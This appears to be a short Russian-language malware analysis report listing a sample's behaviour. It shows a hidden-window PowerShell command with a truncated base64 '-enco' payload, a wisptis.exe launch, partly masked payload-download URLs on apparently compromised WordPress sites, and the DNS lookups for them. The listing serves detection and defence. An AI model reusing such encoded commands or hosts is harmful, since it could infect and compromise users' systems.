Техническая информация
- '<SYSTEM32>\wisptis.exe' /ManualLaunch;
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABPAHcAagByAG0AbgBqAHcAZAA9ACcARgBnAHAAegBuAGUAYwBpAHgAJwA7ACQAVABuAGQAaQBjAG0AdABrAHAAdAAgAD0AIAAnADQANQA2ACcAOwAkAFUAdwB5AHEAZgBkAHMAZgBjAHIAPQAnAE4AZABlAGoAYQBoAHMAZwBxAGYAeQAnADsAJAB...
- http://ja####honline.com/wp-includes/95ju3913/
- http://www.ze#####interactive.com/a0plrga/8f5z946056/
- http://de#.###ntainwatch.com/wp-content/r3/
- DNS ASK ja####honline.com
- DNS ASK re##5.com
- DNS ASK sp###.technode.com
- DNS ASK ze#####interactive.com
- DNS ASK de#.###ntainwatch.com
- '<SYSTEM32>\wisptis.exe' /ManualLaunch;' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABPAHcAagByAG0AbgBqAHcAZAA9ACcARgBnAHAAegBuAGUAYwBpAHgAJwA7ACQAVABuAGQAaQBjAG0AdABrAHAAdAAgAD0AIAAnADQANQA2ACcAOwAkAFUAdwB5AHEAZgBkAHMAZgBjAHIAPQAnAE4AZABlAGoAYQBoAHMAZwBxAGYAeQAnADsAJAB...' (со скрытым окном)